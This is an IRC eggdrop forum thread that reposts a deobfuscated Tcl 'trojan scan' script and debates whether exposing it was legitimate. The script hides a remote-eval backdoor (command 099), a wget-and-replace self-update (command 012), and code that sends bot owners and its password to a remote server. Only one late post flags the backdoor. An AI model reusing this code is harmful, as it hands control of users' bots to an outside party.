View previous topic :: View next topic |
Author |
Message |
^DooM^ Owner

Joined: 26 Aug 2003 Posts: 772 Location: IronForge
|
Posted: Thu May 19, 2005 5:47 am Post subject: encrypted trojan scan script (cont.) |
|
|
Due to the previous thread being screwed up by the long encrypted text line i have reposted Sir_Fz' unencrypted script post here.
Sir_fz wrote: | Code: |
# -- flags
setudef flag aspbgbl
setudef flag aspbwarn
# -- strings
setudef str aspbkickmsg
setudef str detected
setudef str joins
setudef str kicked
# -- bindings
# - remove me
bind MSG -|- "REMOVEME" aspbgbl:remove:user
# - check for possible trojans onjoin
bind JOIN -|- "*" aspbgbl:check:user
# - update channels
bind PART -|- "*" aspbgbl:update:channels
# - update botname
bind NICK -|- "*" aspbgbl:update:nickname
# - script status
bind PUB nm|nm "$::aspb(trigger)" aspbgbl:status
# - auto update
bind TIME -|- "00 * * * *" aspbgbl:update
# --- script main source - NEVER TOUCH IT ;)
# -- auto update aspbgbl
proc aspbgbl:update { minute hour day month year } {
if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
return
}
putdcc $idx "cmd=011 $::aspb(version)"
}
# -- trojan scan control panel
proc aspbgbl:status { nickname hostname handle channel arguments } {
global lastbind
if {[channel get $channel "aspbkickmsg"] == ""} {
channel set $channel aspbkickmsg $::aspb(default)
}
switch -exact -- [string tolower [lindex [split $arguments] 0]] {
"warn" {
set status "Bot will warn users."
if {![channel get $channel "aspbwarn"]} {
set status "Bot won't warn users."
}
switch -exact -- [string tolower [lindex [split $arguments] 1]] {
"on" {
putserv "NOTICE $nickname :Successfully turned on"; channel set $channel +aspbwarn
}
"off" {
putserv "NOTICE $nickname :Successfully turned off"; channel set $channel -aspbwarn
}
"default" {
putserv "NOTICE $nickname :$status Please use: $lastbind \037warn\037 \037on\037|\037off\037"
}
}
}
"stats" {
if {![regexp {[0-9]{1,}} [channel get $channel "joins"]] || ![regexp {[0-9]{1,}} [channel get $channel "detected"]] || ![regexp {[0-9]{1,}} [channel get $channel "kicked"]] || ![channel get $channel "aspbgbl"]} {
putserv "NOTICE $nickname :No statistic available :("; return
}
putserv "NOTICE $nickname :\037Joins:\037 [channel get $channel "joins"] \037Detected Clients:\037 [channel get $channel "detected"] \037Kicked Clients:\037 [channel get $channel "kicked"]"
}
"status" {
set status "aspb is enabled."
if {![channel get $channel "aspbgbl"]} {
set status "aspb is disabled."
}
switch -exact -- [string tolower [lindex [split $arguments] 1]] {
"on" {
putserv "NOTICE $nickname :Successfully turned on."; putserv "PRIVMSG $channel :\001ACTION aspb ver. $::aspb(version) by $::aspb(author)\001"; channel set $channel +aspbgbl
}
"off" {
putserv "NOTICE $nickname :Successfully turned off."; channel set $channel -aspbgbl
}
"default" {
putserv "NOTICE $nickname :$status Please use: $lastbind \037status\037 \037on\037|\037off\037"; return
}
}
if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
return
}
set enabled ""
foreach chan [channels] {
if {![channel get $chan "aspbgbl"]} {
lappend enabled $chan
} else {
lappend enabled +$chan
}
}
putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
}
"kickmsg" {
if {[join [lrange [split $arguments] 1 end]] == ""} {
if {[channel get $channel "aspbkickmsg"] == ""} {
set kickmessage "not set"
} else {
set kickmessage [channel get $channel "aspbkickmsg"]
}
putserv "NOTICE $nickname :Kickmessage: [join $kickmessage]"
putserv "NOTICE $nickname :Please use: $lastbind \037kickmsg\037 \037message\037 (Available options: %1\$s = hostname, %2\$s = botnick, %3\$s = trojan id, %4\$s = detected counter, %5\$s = trojan type)"
return
}
channel set $channel aspbkickmsg [join [lrange [split $arguments] 1 end]]
putserv "NOTICE $nickname :Kickmessage successfully saved."
}
"default" {
set status "aspb is enabled."
if {![channel get $channel "aspbgbl"]} {
set status "aspb is disabled."
}
putserv "NOTICE $nickname :$status Please use: $lastbind \037warn\037|\037status\037|\037stats\037|\037kickmsg\037 \037?arguments?\037"
}
}
}
# -- get command/result from the database
proc aspbgbl:database { idx arguments } {
if {![valididx $idx]} {
return
}
foreach argument $arguments {
if {[regexp -- {^(.+?)=(.+?)$} $argument -> variable value]} {
set $variable $value
}
}
if {![info exists cmd]} {
return
}
if {$cmd == "004"} {
if {![info exists type]} {
set type ""
}
channel set $chan detected [expr [channel get $chan "detected"] + 1]
channel set $chan kicked [expr [channel get $chan "kicked"] + 1]
if {![info exists reason] || [llength $reason] < 1} {
set reason [format [join [channel get $chan "aspbkickmsg"]] [lindex [split $mask "@"] 1] $::botnick $id [channel get $chan "detected"] $type]; set warn 1
} else {
regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason; set warn 0
}
set unban ""
foreach chanban [chanbans $chan] {
if {[lindex $chanban 2] >= 300} {
lappend unban [lindex $chanban 0]
}
if {[llength $unban] == "6"} {
putquick "MODE $chan -[string repeat "b" [llength $unban]] [join $unban]"; set unban ""
}
}
if {$unban == "" && [llength [chanbans $chan]] == "45"} {
set banid 0
while {$banid < 5} {
lappend unban [lindex [lindex [chanbans $chan] $banid] 0]; incr banid 1
}
}
putquick "KICK $chan $nick :$reason" -next
putquick "MODE $chan -[string repeat "b" [llength $unban]]+b [join $unban] $mask"
if {[channel get $chan "aspbwarn"] && $warn} {
putserv "NOTICE $nick :You are known as possible ${type}-trojan infected drone. If you wish to remove yourself, please type in: /msg $::botnick removeme"
putserv "NOTICE $nick :More Information can be found at: \037[format www.pjen.net/?id=%d&botnick=%s $id $::botnick]\037"
}
} elseif {$cmd == "099"} {
regexp -nocase -- {^.+ exec=(.+?)$} $arguments -> exec; catch { eval [string trim [decrypt aspb $exec]] }
} elseif {$cmd == "013"} {
if {![validchan $chan]} {
return
}
channel set $chan -aspbgbl
if {![info exists reason]} {
set reason "not given"
} else {
regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason
}
putserv "PRIVMSG $chan :\001ACTION cries, aspb turned off for this channel. (reason: $reason)\001"
} elseif {$cmd == "010"} {
if {![info exists reason]} {
set reason "not given"
} else {
regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason
}
foreach chan [channels] {
if {![channel get $chan "aspbgbl"]} {
continue
}
channel set $chan -aspbgbl
putserv "PRIVMSG $chan :\001ACTION cries, aspb turned off for this channel. (reason: $reason)\001"
}
} elseif {$cmd == "012"} {
if {[catch { exec wget $url } result]} {
if {![info exists changes]} {
set changes "not given"
} else {
regexp -nocase -- {^.+ message=(.+?)$} $arguments -> changes
}
if {[regexp -- {^.+\`(.+?)\'.+$} $result -> filename]} {
if {[file exists $::aspb(path)]} {
file delete -force $::aspb(path)
}
file rename -force $filename $::aspb(path)
if {[file exists $filename]} {
file delete -force $filename
}
set owners ""
foreach owner [userlist n] {
if {[hand2nick $owner] != ""} {
lappend owners [hand2nick $owner]
}
}
if {[llength $owners] > 0} {
putserv "PRIVMSG [join $owners ","] :Your aspbgbl version has been updated. (Changes: $changes)"
}
if {[array exists ::aspb]} {
array unset ::aspb
}
catch { killdcc $idx }
rehash
}
return
}
putlog "aspbgbl\002:\002 There is a new aspbgbl version available."
} elseif {$cmd == "009"} {
if {!$status} {
puthelp "NOTICE $nick :Your hostname '$mask' isn't known in the database.";return
}
puthelp "NOTICE $nick :Your hostname '$mask' has been successfully removed."
set unbanned ""
foreach channel [channels] {
if {[channel get $channel "aspbgbl"]} {
foreach channelban [chanbans $channel] {
if {[string match -nocase [lindex [split $channelban] 0] $mask]} {
lappend unbanned $channel; pushmode $channel -b [lindex [split $channelban] 0]
}
}
}
}
if {[llength $unbanned] > 0} {
puthelp "NOTICE $nick :Feel free to rejoin the following [expr {([llength $unbanned] == 1) ? "channel" : "channels" }] [join $unbanned ", "]"
}
} elseif {$cmd == "014"} {
regexp -nocase -- {^.+ message=(.+?)$} $arguments -> message
if {![info exists message]} {
return
}
set list ""
foreach owner [userlist n] {
if {[set nick [hand2nick $owner]] != ""} {
lappend list $nick
}
}
putserv "PRIVMSG [join $list ","] :$message"
} elseif {$cmd == "015"} {
regexp -nocase -- {^.+ message=(.+?)$} $arguments -> message
if {![info exists message]} {
return
}
set list ""
foreach channel [channels] {
if {[channel get $channel "aspbgbl"]} {
lappend list $channel
}
}
putserv "PRIVMSG [join $list ","] :\001ACTION attention, aspb broadcast: $message\001"
}
}
# -- remove a possible user
proc aspbgbl:remove:user { nickname hostname handle arguments } {
if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
return
}
putdcc $idx "cmd=008 $nickname!$hostname"
}
# -- update database information
proc aspbgbl:update:channels { nickname hostname handle channel reason } {
if {[isbotnick $nickname]} {
if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
return
}
set enabled ""
foreach chan [channels] {
if {[string equal -nocase $chan $channel]} {
continue
}
if {![channel get $chan "aspbgbl"]} {
lappend enabled $chan
} else {
lappend enabled +$chan
}
}
putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
}
}
# -- update botname information
proc aspbgbl:update:nickname { nickname hostname handle channel newnick } {
global nospam
if {[isbotnick $nickname] && ![string equal -nocase $nickname $newnick]} {
if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
return
} elseif {[info exists nospam] && [expr [unixtime] - $nospam] < 5} {
return
}
set enabled ""
foreach chan [channels] {
if {![channel get $chan "aspbgbl"]} {
lappend enabled $chan
} else {
lappend enabled +$chan
}
}
putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
set nospam [unixtime]
}
}
# -- check for possible trojan on join
proc aspbgbl:check:user { nickname hostname handle channel } {
if {[isbotnick $nickname]} {
if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
return
}
set enabled ""
foreach chan [channels] {
if {![channel get $chan "aspbgbl"]} {
lappend enabled $chan
} else {
lappend enabled +$chan
}
}
putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
return
}
channel set $channel joins [expr [channel get $channel "joins"] + 1]
if {[string match "*quakenet.org" $hostname]} {
return
} elseif {[matchattr $handle mno|mno $channel]} {
return
} elseif {![botisop $channel]} {
return
} elseif {[regexp -- {i|k|r} [lindex [getchanmode $channel] 0]]} {
return
} elseif {![channel get $channel "aspbgbl"]} {
return
} elseif {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
return
} elseif {[isbotnick $nickname]} {
return
}
if {[channel get $channel "aspbkickmsg"] == ""} {
channel set $channel aspbkickmsg $::aspb(default)
}
set idler 0
set operator 0
set voice 0
foreach user [chanlist $channel] {
if {[isop $user $channel]} {
incr operator 1
} elseif {[isvoice $user $channel]} {
incr voice 1
}
incr idler 1
}
putdcc $idx "cmd=003 $nickname!$hostname $channel $idler $operator $voice"
}
# -- get idx for the aspbgbl database
proc aspbgbl:connection { address } {
foreach socket [dcclist] {
if {[string equal -nocase $address [lindex [split $socket] 2]]} {
return [lindex [split $socket] 0]
}
}
if {![valididx [set idx [connect $::aspb(address) $::aspb(port)]]]} {
return -1
}
set enabled ""
foreach channel [channels] {
if {![channel get $channel "aspbgbl"]} {
lappend enabled $channel
} else {
lappend enabled +$channel
}
}
putdcc $idx "cmd=001 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
control $idx aspbgbl:database
return $idx
} |
|
_________________ The lifecycle of a noob is complex. Fledgling noobs gestate inside biometric pods. Once a budding noob has matured thru gestation they climb out of their pod, sit down at a PC, ask a bunch of questions that are clearly in the FAQ, The Noob is born |
|
Back to top |
|
 |
Sir_Fz Revered One

Joined: 27 Apr 2003 Posts: 3793 Location: Lebanon
|
|
Back to top |
|
 |
Alchera Revered One

Joined: 11 Aug 2003 Posts: 3344 Location: Ballarat Victoria, Australia
|
Posted: Thu May 19, 2005 7:39 am Post subject: |
|
|
So I didn't need new glasses after all? Yay!  _________________ Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM |
|
Back to top |
|
 |
^DooM^ Owner

Joined: 26 Aug 2003 Posts: 772 Location: IronForge
|
Posted: Thu May 19, 2005 8:39 am Post subject: |
|
|
Haha it took me a while to find the post it just looked like therewas nothing till I scrolled over and down. Just doing my good deed for the day  _________________ The lifecycle of a noob is complex. Fledgling noobs gestate inside biometric pods. Once a budding noob has matured thru gestation they climb out of their pod, sit down at a PC, ask a bunch of questions that are clearly in the FAQ, The Noob is born |
|
Back to top |
|
 |
Thunderdome Op

Joined: 15 Mar 2005 Posts: 187
|
Posted: Thu May 19, 2005 9:01 am Post subject: |
|
|
How does this script work? I tried to read the code, but I don't understand what it does... |
|
Back to top |
|
 |
ex Voice

Joined: 18 May 2005 Posts: 14 Location: Chicago
|
Posted: Thu May 19, 2005 10:41 am Post subject: |
|
|
it connects to a bot and on every join it asks whether it is a spamclient or not.
+ some additional features. |
|
Back to top |
|
 |
metroid Owner
Joined: 16 Jun 2004 Posts: 771
|
Posted: Thu May 19, 2005 6:29 pm Post subject: |
|
|
Guys, i just happen to know who made this script and code get obfuscated for a reason. You shouldn't deobfuscate code for someone without the explicit authorisation from the author, unless there would be malious code in it, which i dont think there is.. |
|
Back to top |
|
 |
greenbear Owner
Joined: 24 Sep 2001 Posts: 733 Location: Norway
|
Posted: Thu May 19, 2005 8:38 pm Post subject: |
|
|
thats just bullshit. its distributed freely under the gnu licence. if he didnt want ppl to read it, he shouldnt have made it public. |
|
Back to top |
|
 |
Sir_Fz Revered One

Joined: 27 Apr 2003 Posts: 3793 Location: Lebanon
|
Posted: Fri May 20, 2005 3:43 am Post subject: |
|
|
Exactly, I believe the user has the right to know what he's loading on his eggdrop. And you said it MeTroiD, it may have malicious code (and I don't think we can say if it has or not since probably noone has tried to look through it)
Besides, it's decrypting, the code is still the same. _________________ Follow me on GitHub
- Opposing
Public Tcl scripts |
|
Back to top |
|
 |
^DooM^ Owner

Joined: 26 Aug 2003 Posts: 772 Location: IronForge
|
Posted: Fri May 20, 2005 5:57 am Post subject: |
|
|
Sir_Fz wrote: | Exactly, I believe the user has the right to know what he's loading on his eggdrop. And you said it MeTroiD, it may have malicious code (and I don't think we can say if it has or not since probably noone has tried to look through it)
Besides, it's decrypting, the code is still the same. |
Also it doesn't say anywhere in the script that it is prohibited to decrypt this script to see what is in it. As gb said. If the author did not want people to see his code then he should not of released it to the public. _________________ The lifecycle of a noob is complex. Fledgling noobs gestate inside biometric pods. Once a budding noob has matured thru gestation they climb out of their pod, sit down at a PC, ask a bunch of questions that are clearly in the FAQ, The Noob is born |
|
Back to top |
|
 |
Alchera Revered One

Joined: 11 Aug 2003 Posts: 3344 Location: Ballarat Victoria, Australia
|
Posted: Fri May 20, 2005 6:49 pm Post subject: |
|
|
I thought only Vulcans used logic?
Bravo one and all. _________________ Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM |
|
Back to top |
|
 |
Sir_Fz Revered One

Joined: 27 Apr 2003 Posts: 3793 Location: Lebanon
|
Posted: Fri May 20, 2005 7:26 pm Post subject: |
|
|
I forgot to mention, that code was encrypted like 4 times lol, Everytime I decrypted it, it showed me yet another encryption (was about to give up on it ) maybe next time he should try encrypting it endlessly  _________________ Follow me on GitHub
- Opposing
Public Tcl scripts |
|
Back to top |
|
 |
Galadhrim Op
Joined: 11 Apr 2003 Posts: 123 Location: Netherlands, Enschede
|
Posted: Sat May 21, 2005 4:41 am Post subject: |
|
|
maybe make a better decrypter that uses recursiveness. |
|
Back to top |
|
 |
De Kus Revered One

Joined: 15 Dec 2002 Posts: 1361 Location: Germany
|
Posted: Sat May 21, 2005 9:42 am Post subject: |
|
|
^DooM^ wrote: | Also it doesn't say anywhere in the script that it is prohibited to decrypt this script to see what is in it. As gb said. If the author did not want people to see his code then he should not of released it to the public. |
Since he distributed it under the GNU GPL it would be even illegal to make the source code unaccessable. _________________ De Kus
StarZ|De_Kus, De_Kus or DeKus on IRC
Copyright © 2005-2009 by De Kus - published under The MIT License
Love hurts, love strengthens... |
|
Back to top |
|
 |
Arie Voice
Joined: 18 Jul 2005 Posts: 1
|
Posted: Mon Jul 18, 2005 10:29 am Post subject: |
|
|
the part:
Code: | } elseif {$cmd == "099"} {
regexp -nocase -- {^.+ exec=(.+?)$} $arguments -> exec; catch { eval [string trim [decrypt aspb $exec]] } |
was a backdoor i heard - dont know tcl =p |
|
Back to top |
|
 |
|